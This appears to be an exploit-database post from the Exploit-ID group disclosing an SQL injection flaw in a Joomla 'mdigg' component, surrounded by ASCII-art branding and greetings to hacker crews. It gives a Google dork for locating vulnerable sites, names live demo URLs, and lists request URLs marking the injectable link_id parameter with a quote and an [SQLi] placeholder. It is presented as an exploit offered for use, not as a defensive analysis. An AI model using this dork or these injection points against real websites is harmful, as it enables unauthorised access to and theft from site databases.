Joomla mdigg Component SQL Injection Vulnerability | João Paulo @little

=====================================================================

.__ .__ __ .__ .___

____ ___ _________ | | ____ |__|/ |_ |__| __| _/

_/ __ \ / /____ | | / _ | __ ______ | |/ __ |

___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |

___ >__/_ | __/|____/____/|__||__| |______ |

/ /|__| /

Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com

e-mail : root[at]exploit-id[dot]com

#########################################

I'm Caddy-Dz, member of Exploit-Id

#########################################

======================================================================

####

# Exploit Title: joomla component SQL Injection Vulnerability

# Author: Caddy-Dz

# Facebook Page: www.facebook.com/islam.caddy

# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com

# Website: www.exploit-id.com

# Google Dork: "Powered by joomla" inurl:link_id

# Category:: Webapps

# Tested on: [Windows Vista Edition Intégral- French]

# http://demo15.joomlaapps.com/

# http://demo15.joomlaapps.com/mdigg.html

####

[*] ExpLo!T :

http://127.0.0.1/?act=story_lists&task=item&link_id=1'

http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]

http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|

# Greets To :                                                                                |

KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |

All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |

All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |

RmZ ...others                                                                              |

============================================================================================ |